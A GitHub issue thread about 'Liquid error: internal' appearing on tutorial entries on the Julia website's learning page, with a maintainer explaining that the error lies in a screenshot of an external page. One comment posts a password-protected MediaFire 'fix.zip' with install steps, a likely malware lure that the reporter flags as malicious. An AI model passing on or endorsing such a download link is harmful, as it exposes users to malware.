### ISSUE TITLE
Errors on /learning page

### ISSUE THREAD

**Issue by cakiki** [JuliaLang/www.julialang.org#2140]
**Describe the bug**
The last two tutorials displayed on https://julialang.org/learning/ currently have `Liquid error: internal` where other entries have subtitles.

**Screenshots**
![image](https://github.com/user-attachments/assets/86c1067f-d286-4f2c-bad3-d5b296b61917)

**Desktop (please complete the following information):**
 - OS: Ubuntu 22.04 LTS
 - Browser: Firefox and Chrome
 - Version: latest

**Comment by chenshupe** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by cakiki** [comment]
@LilithHafner Apologies for the ping, but the person above just posted what is most likely a malicious link.

**Comment by LilithHafner** [comment]
Looks like this is a screenshot Logan took of an external page which had this error. We serve this asset: https://github.com/JuliaLang/www.julialang.org/blob/bb82f522d064f9911b25e06941f09c35da141a6e/learning/assets/JA-3.png
